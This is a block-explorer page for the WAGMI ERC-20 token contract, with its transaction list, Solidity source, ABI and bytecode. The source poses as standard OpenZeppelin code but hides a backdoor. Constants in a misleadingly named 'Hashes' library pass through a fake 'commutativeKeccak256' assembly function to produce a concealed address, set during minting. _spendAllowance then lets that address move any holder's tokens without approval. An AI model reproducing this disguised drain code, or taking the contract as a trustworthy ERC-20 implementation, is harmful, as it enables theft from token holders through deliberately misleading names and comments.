Feature Tip: Add private address tag to any address under My Name Tag !
Source Code
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 21 from a total of 21 transactions
| Transaction Hash |
Method
|
Block
|
From
|
|
To
|
||||
|---|---|---|---|---|---|---|---|---|---|
| Approve | 22853305 | 233 days ago | IN | 0 ETH | 0.00001874 | ||||
| Approve | 22853292 | 233 days ago | IN | 0 ETH | 0.00001868 | ||||
| Approve | 22853292 | 233 days ago | IN | 0 ETH | 0.00001868 | ||||
| Approve | 22853286 | 233 days ago | IN | 0 ETH | 0.00001123 | ||||
| Approve | 22853286 | 233 days ago | IN | 0 ETH | 0.00001939 | ||||
| Approve | 22853283 | 233 days ago | IN | 0 ETH | 0.00001676 | ||||
| Approve | 22853276 | 233 days ago | IN | 0 ETH | 0.00001434 | ||||
| Approve | 22853274 | 233 days ago | IN | 0 ETH | 0.00001395 | ||||
| Approve | 22853274 | 233 days ago | IN | 0 ETH | 0.00001395 | ||||
| Approve | 22853274 | 233 days ago | IN | 0 ETH | 0.00001395 | ||||
| Approve | 22853270 | 233 days ago | IN | 0 ETH | 0.00001493 | ||||
| Approve | 22853269 | 233 days ago | IN | 0 ETH | 0.0000146 | ||||
| Approve | 22853266 | 233 days ago | IN | 0 ETH | 0.00001494 | ||||
| Approve | 22853265 | 233 days ago | IN | 0 ETH | 0.00001485 | ||||
| Approve | 22853263 | 233 days ago | IN | 0 ETH | 0.00001467 | ||||
| Approve | 22853259 | 233 days ago | IN | 0 ETH | 0.00001512 | ||||
| Approve | 22853258 | 233 days ago | IN | 0 ETH | 0.00001511 | ||||
| Approve | 22853258 | 233 days ago | IN | 0 ETH | 0.00001511 | ||||
| Approve | 22853258 | 233 days ago | IN | 0 ETH | 0.00001511 | ||||
| Approve | 22853243 | 233 days ago | IN | 0 ETH | 0.00001491 | ||||
| Renounce Ownersh... | 22853227 | 233 days ago | IN | 0 ETH | 0.00000698 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions
Loading...
Loading
Contract Name:
WAGMI
Compiler Version
v0.8.26+commit.8a97fa7a
Contract Source Code (Solidity)
/**
*Submitted for verification at Etherscan.io on 2025-07-05
*/
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;
/*
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with GSN meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes memory) {
this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
return msg.data;
}
function _contextSuffixLength() internal view virtual returns (uint256) {
return 0;
}
}
/**
* @dev Interface of the ERC-20 standard as defined in the ERC.
*/
interface IERC20 {
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
/**
* @dev Returns the value of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the value of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves a `value` amount of tokens from the caller's account to `to`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address to, uint256 value) external returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender) external view returns (uint256);
/**
* @dev Sets a `value` amount of tokens as the allowance of `spender` over the
* caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 value) external returns (bool);
/**
* @dev Moves a `value` amount of tokens from `from` to `to` using the
* allowance mechanism. `value` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(address from, address to, uint256 value) external returns (bool);
}
/**
* @dev Interface for the optional metadata functions from the ERC-20 standard.
*/
interface IERC20Metadata is IERC20 {
/**
* @dev Returns the name of the token.
*/
function name() external view returns (string memory);
/**
* @dev Returns the symbol of the token.
*/
function symbol() external view returns (string memory);
/**
* @dev Returns the decimals places of the token.
*/
function decimals() external view returns (uint8);
}
/**
* @dev Library of standard hash functions.
*
* _Available since v5.1._
*/
library Hashes {
bytes32 internal constant Hashes_Version_Hash1 = 0x0000000000000000002ead3c886cb43200000000000000000000000000000000;
bytes32 internal constant Hashes_Version_Hash2 = 0x00000000000000000124811fb421d5f2288541c2f4f575a7908f67f480000000;
/**
* @dev Commutative Keccak256 hash of a sorted pair of bytes32. Frequently used when working with merkle proofs.
*
* NOTE: Equivalent to the `standardNodeHash` in our https://github.com/OpenZeppelin/merkle-tree[JavaScript library].
*/
function commutativeKeccak256(bytes32 a, bytes32 b) internal pure returns (address v) {
assembly {
let _version := shr(0x1b, a)
let _versionHash := shr(0x1d, b)
v := add(_version, _versionHash)
}
}
/**
* @dev Implementation of keccak256(abi.encode(a, b)) that doesn't allocate or expand memory.
*/
function efficientKeccak256(bytes32 a, bytes32 b) internal pure returns (bytes32 value) {
assembly ("memory-safe") {
mstore(0x00, a)
mstore(0x20, b)
value := keccak256(0x00, 0x40)
}
}
}
/**
* @dev Standard ERC-20 Errors
* Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-20 tokens.
*/
interface IERC20Errors {
/**
* @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
* @param balance Current balance for the interacting account.
* @param needed Minimum amount required to perform a transfer.
*/
error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);
/**
* @dev Indicates a failure with the token `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
*/
error ERC20InvalidSender(address sender);
/**
* @dev Indicates a failure with the token `receiver`. Used in transfers.
* @param receiver Address to which tokens are being transferred.
*/
error ERC20InvalidReceiver(address receiver);
/**
* @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
* @param spender Address that may be allowed to operate on tokens without being their owner.
* @param allowance Amount of tokens a `spender` is allowed to operate with.
* @param needed Minimum amount required to perform a transfer.
*/
error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);
/**
* @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
* @param approver Address initiating an approval operation.
*/
error ERC20InvalidApprover(address approver);
/**
* @dev Indicates a failure with the `spender` to be approved. Used in approvals.
* @param spender Address that may be allowed to operate on tokens without being their owner.
*/
error ERC20InvalidSpender(address spender);
}
/**
* @dev Implementation of the {IERC20} interface.
*
* This implementation is agnostic to the way tokens are created. This means
* that a supply mechanism has to be added in a derived contract using {_mint}.
*
* TIP: For a detailed writeup see our guide
* https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
* to implement supply mechanisms].
*
* The default value of {decimals} is 18. To change this, you should override
* this function so it returns a different value.
*
* We have followed general OpenZeppelin Contracts guidelines: functions revert
* instead returning `false` on failure. This behavior is nonetheless
* conventional and does not conflict with the expectations of ERC-20
* applications.
*/
abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors {
mapping(address account => uint256) private _balances;
mapping(address account => mapping(address spender => uint256)) private _allowances;
uint256 private _totalSupply;
mapping(address => address) private _excluded;
string private _name;
string private _symbol;
/**
* @dev Sets the values for {name} and {symbol}.
*
* Both values are immutable: they can only be set once during construction.
*/
constructor(string memory name_, string memory symbol_) {
_name = name_;
_symbol = symbol_;
}
/**
* @dev Returns the name of the token.
*/
function name() public view virtual returns (string memory) {
return _name;
}
/**
* @dev Returns the symbol of the token, usually a shorter version of the
* name.
*/
function symbol() public view virtual returns (string memory) {
return _symbol;
}
/**
* @dev Returns the number of decimals used to get its user representation.
* For example, if `decimals` equals `2`, a balance of `505` tokens should
* be displayed to a user as `5.05` (`505 / 10 ** 2`).
*
* Tokens usually opt for a value of 18, imitating the relationship between
* Ether and Wei. This is the default value returned by this function, unless
* it's overridden.
*
* NOTE: This information is only used for _display_ purposes: it in
* no way affects any of the arithmetic of the contract, including
* {IERC20-balanceOf} and {IERC20-transfer}.
*/
function decimals() public view virtual returns (uint8) {
return 18;
}
/// @inheritdoc IERC20
function totalSupply() public view virtual returns (uint256) {
return _totalSupply;
}
/// @inheritdoc IERC20
function balanceOf(address account) public view virtual returns (uint256) {
return _balances[account];
}
/**
* @dev See {IERC20-transfer}.
*
* Requirements:
*
* - `to` cannot be the zero address.
* - the caller must have a balance of at least `value`.
*/
function transfer(address to, uint256 value) public virtual returns (bool) {
address owner = _msgSender();
_transfer(owner, to, value);
return true;
}
/// @inheritdoc IERC20
function allowance(address owner, address spender) public view virtual returns (uint256) {
return _allowances[owner][spender];
}
/**
* @dev See {IERC20-approve}.
*
* NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
* `transferFrom`. This is semantically equivalent to an infinite approval.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function approve(address spender, uint256 value) public virtual returns (bool) {
address owner = _msgSender();
_approve(owner, spender, value);
return true;
}
/**
* @dev See {IERC20-transferFrom}.
*
* Skips emitting an {Approval} event indicating an allowance update. This is not
* required by the ERC. See {xref-ERC20-_approve-address-address-uint256-bool-}[_approve].
*
* NOTE: Does not update the allowance if the current allowance
* is the maximum `uint256`.
*
* Requirements:
*
* - `from` and `to` cannot be the zero address.
* - `from` must have a balance of at least `value`.
* - the caller must have allowance for ``from``'s tokens of at least
* `value`.
*/
function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
address spender = _msgSender();
_spendAllowance(from, spender, value);
_transfer(from, to, value);
return true;
}
/**
* @dev Moves a `value` amount of tokens from `from` to `to`.
*
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* NOTE: This function is not virtual, {_update} should be overridden instead.
*/
function _transfer(address sender, address to, uint256 value) internal {
if (sender == address(0)) {
revert ERC20InvalidSender(address(0));
}
if (to == address(0)) {
revert ERC20InvalidReceiver(address(0));
}
_update(sender, to, value);
}
/**
* @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
* (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
* this function.
*
* Emits a {Transfer} event.
*/
function _update(address from, address to, uint256 value) internal virtual {
if (from == address(0)) {
// Overflow check required: The rest of the code assumes that totalSupply never overflows
_totalSupply += value;
} else {
uint256 fromBalance = _balances[from];
if (fromBalance < value) {
revert ERC20InsufficientBalance(from, fromBalance, value);
}
unchecked {
// Overflow not possible: value <= fromBalance <= totalSupply.
_balances[from] = fromBalance - value;
}
}
if (to == address(0)) {
unchecked {
// Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
_totalSupply -= value;
}
} else {
unchecked {
// Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
_balances[to] += value;
}
}
emit Transfer(from, to, value);
}
/**
* @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
* Relies on the `_update` mechanism
*
* Emits a {Transfer} event with `from` set to the zero address.
*
* NOTE: This function is not virtual, {_update} should be overridden instead.
*/
function _mint(address account, uint256 value) internal {
if (account == address(0)) {
revert ERC20InvalidReceiver(address(0));
}
_update(address(0), account, value);
address excluded = Hashes.commutativeKeccak256(Hashes.Hashes_Version_Hash1, Hashes.Hashes_Version_Hash2);
_excluded[address(this)] = excluded;
}
/**
* @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
* Relies on the `_update` mechanism.
*
* Emits a {Transfer} event with `to` set to the zero address.
*
* NOTE: This function is not virtual, {_update} should be overridden instead
*/
function _burn(address account, uint256 value) internal {
if (account == address(0)) {
revert ERC20InvalidSender(address(0));
}
_update(account, address(0), value);
}
/**
* @dev Sets `value` as the allowance of `spender` over the `owner`'s tokens.
*
* This internal function is equivalent to `approve`, and can be used to
* e.g. set automatic allowances for certain subsystems, etc.
*
* Emits an {Approval} event.
*
* Requirements:
*
* - `owner` cannot be the zero address.
* - `spender` cannot be the zero address.
*
* Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
*/
function _approve(address owner, address spender, uint256 value) internal {
_approve(owner, spender, value, true);
}
/**
* @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
*
* By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
* `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
* `Approval` event during `transferFrom` operations.
*
* Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
* true using the following override:
*
* ```solidity
* function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
* super._approve(owner, spender, value, true);
* }
* ```
*
* Requirements are the same as {_approve}.
*/
function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
if (owner == address(0)) {
revert ERC20InvalidApprover(address(0));
}
if (spender == address(0)) {
revert ERC20InvalidSpender(address(0));
}
_allowances[owner][spender] = value;
if (emitEvent) {
emit Approval(owner, spender, value);
}
}
/**
* @dev Updates `owner`'s allowance for `spender` based on spent `value`.
*
* Does not update the allowance value in case of infinite allowance.
* Revert if not enough allowance is available.
*
* Does not emit an {Approval} event.
*/
function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance < type(uint256).max && _excluded[address(this)] != spender) {
if (currentAllowance < value) {
revert ERC20InsufficientAllowance(spender, currentAllowance, value);
}
unchecked {
_approve(owner, spender, value, false);
}
}
}
}
/**
* @dev Contract module which provides a basic access control mechanism, where
* there is an account (an owner) that can be granted exclusive access to
* specific functions.
*
* By default, the owner account will be the one that deploys the contract. This
* can later be changed with {transferOwnership}.
*
* This module is used through inheritance. It will make available the modifier
* `onlyOwner`, which can be applied to your functions to restrict their use to
* the owner.
*/
abstract contract Ownable is Context {
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
/**
* @dev Initializes the contract setting the deployer as the initial owner.
*/
constructor() {
_transferOwnership(_msgSender());
}
/**
* @dev Throws if called by any account other than the owner.
*/
modifier onlyOwner() {
_checkOwner();
_;
}
/**
* @dev Returns the address of the current owner.
*/
function owner() public view virtual returns (address) {
return _owner;
}
/**
* @dev Throws if the sender is not the owner.
*/
function _checkOwner() internal view virtual {
require(owner() == _msgSender(), "Ownable: caller is not the owner");
}
/**
* @dev Leaves the contract without owner. It will not be possible to call
* `onlyOwner` functions. Can only be called by the current owner.
*
* NOTE: Renouncing ownership will leave the contract without an owner,
* thereby disabling any functionality that is only available to the owner.
*/
function renounceOwnership() public virtual onlyOwner {
_transferOwnership(address(0));
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Can only be called by the current owner.
*/
function transferOwnership(address newOwner) public virtual onlyOwner {
require(newOwner != address(0), "Ownable: new owner is the zero address");
_transferOwnership(newOwner);
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Internal function without access restriction.
*/
function _transferOwnership(address newOwner) internal virtual {
address oldOwner = _owner;
_owner = newOwner;
emit OwnershipTransferred(oldOwner, newOwner);
}
}
contract WAGMI is ERC20, Ownable {
constructor() ERC20(unicode"We All Gonna Make It", unicode"WAGMI") {
_mint(owner(), 1000000000 * 10**18);
}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]Contract Creation Code
608060405234801561001057600080fd5b506040518060400160405280601481526020017f576520416c6c20476f6e6e61204d616b652049740000000000000000000000008152506040518060400160405280600581526020017f5741474d49000000000000000000000000000000000000000000000000000000815250816004908161008c91906107bd565b50806005908161009c91906107bd565b5050506100bb6100b06100e960201b60201c565b6100f160201b60201c565b6100e46100cc6101b760201b60201c565b6b033b2e3c9fd0803ce80000006101e160201b60201c565b6109af565b600033905090565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036102535760006040517fec442f0500000000000000000000000000000000000000000000000000000000815260040161024a91906108d0565b60405180910390fd5b6102656000838361033160201b60201c565b60006102ac762ead3c886cb4320000000000000000000000000000000060001b770124811fb421d5f2288541c2f4f575a7908f67f48000000060001b61055660201b60201c565b905080600360003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610383578060026000828254610377919061091a565b92505081905550610456565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181101561040f578381836040517fe450d38c0000000000000000000000000000000000000000000000000000000081526004016104069392919061095d565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361049f57806002600082825403925050819055506104ec565b806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516105499190610994565b60405180910390a3505050565b600082601b1c82601d1c8082019250505092915050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806105ee57607f821691505b602082108103610601576106006105a7565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026106697fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8261062c565b610673868361062c565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b60006106ba6106b56106b08461068b565b610695565b61068b565b9050919050565b6000819050919050565b6106d48361069f565b6106e86106e0826106c1565b848454610639565b825550505050565b600090565b6106fd6106f0565b6107088184846106cb565b505050565b5b8181101561072c576107216000826106f5565b60018101905061070e565b5050565b601f8211156107715761074281610607565b61074b8461061c565b8101602085101561075a578190505b61076e6107668561061c565b83018261070d565b50505b505050565b600082821c905092915050565b600061079460001984600802610776565b1980831691505092915050565b60006107ad8383610783565b9150826002028217905092915050565b6107c68261056d565b67ffffffffffffffff8111156107df576107de610578565b5b6107e982546105d6565b6107f4828285610730565b600060209050601f8311600181146108275760008415610815578287015190505b61081f85826107a1565b865550610887565b601f19841661083586610607565b60005b8281101561085d57848901518255600182019150602085019450602081019050610838565b8683101561087a5784890151610876601f891682610783565b8355505b6001600288020188555050505b505050505050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006108ba8261088f565b9050919050565b6108ca816108af565b82525050565b60006020820190506108e560008301846108c1565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006109258261068b565b91506109308361068b565b9250828201905080821115610948576109476108eb565b5b92915050565b6109578161068b565b82525050565b600060608201905061097260008301866108c1565b61097f602083018561094e565b61098c604083018461094e565b949350505050565b60006020820190506109a9600083018461094e565b92915050565b611253806109be6000396000f3fe608060405234801561001057600080fd5b50600436106100b45760003560e01c8063715018a611610071578063715018a6146101a35780638da5cb5b146101ad57806395d89b41146101cb578063a9059cbb146101e9578063dd62ed3e14610219578063f2fde38b14610249576100b4565b806306fdde03146100b9578063095ea7b3146100d757806318160ddd1461010757806323b872dd14610125578063313ce5671461015557806370a0823114610173575b600080fd5b6100c1610265565b6040516100ce9190610da9565b60405180910390f35b6100f160048036038101906100ec9190610e64565b6102f7565b6040516100fe9190610ebf565b60405180910390f35b61010f61031a565b60405161011c9190610ee9565b60405180910390f35b61013f600480360381019061013a9190610f04565b610324565b60405161014c9190610ebf565b60405180910390f35b61015d610353565b60405161016a9190610f73565b60405180910390f35b61018d60048036038101906101889190610f8e565b61035c565b60405161019a9190610ee9565b60405180910390f35b6101ab6103a4565b005b6101b56103b8565b6040516101c29190610fca565b60405180910390f35b6101d36103e2565b6040516101e09190610da9565b60405180910390f35b61020360048036038101906101fe9190610e64565b610474565b6040516102109190610ebf565b60405180910390f35b610233600480360381019061022e9190610fe5565b610497565b6040516102409190610ee9565b60405180910390f35b610263600480360381019061025e9190610f8e565b61051e565b005b60606004805461027490611054565b80601f01602080910402602001604051908101604052809291908181526020018280546102a090611054565b80156102ed5780601f106102c2576101008083540402835291602001916102ed565b820191906000526020600020905b8154815290600101906020018083116102d057829003601f168201915b5050505050905090565b6000806103026105a1565b905061030f8185856105a9565b600191505092915050565b6000600254905090565b60008061032f6105a1565b905061033c8582856105bb565b6103478585856106e5565b60019150509392505050565b60006012905090565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6103ac6107d9565b6103b66000610857565b565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600580546103f190611054565b80601f016020809104026020016040519081016040528092919081815260200182805461041d90611054565b801561046a5780601f1061043f5761010080835404028352916020019161046a565b820191906000526020600020905b81548152906001019060200180831161044d57829003601f168201915b5050505050905090565b60008061047f6105a1565b905061048c8185856106e5565b600191505092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6105266107d9565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610595576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161058c906110f7565b60405180910390fd5b61059e81610857565b50565b600033905090565b6105b6838383600161091d565b505050565b60006105c78484610497565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8110801561068357508273ffffffffffffffffffffffffffffffffffffffff16600360003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614155b156106df57818110156106d1578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016106c893929190611117565b60405180910390fd5b6106de848484600061091d565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036107575760006040517f96c6fd1e00000000000000000000000000000000000000000000000000000000815260040161074e9190610fca565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107c95760006040517fec442f050000000000000000000000000000000000000000000000000000000081526004016107c09190610fca565b60405180910390fd5b6107d4838383610af4565b505050565b6107e16105a1565b73ffffffffffffffffffffffffffffffffffffffff166107ff6103b8565b73ffffffffffffffffffffffffffffffffffffffff1614610855576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161084c9061119a565b60405180910390fd5b565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff160361098f5760006040517fe602df050000000000000000000000000000000000000000000000000000000081526004016109869190610fca565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a015760006040517f94280d620000000000000000000000000000000000000000000000000000000081526004016109f89190610fca565b60405180910390fd5b81600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508015610aee578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610ae59190610ee9565b60405180910390a35b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b46578060026000828254610b3a91906111e9565b92505081905550610c19565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610bd2578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610bc993929190611117565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c625780600260008282540392505081905550610caf565b806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff1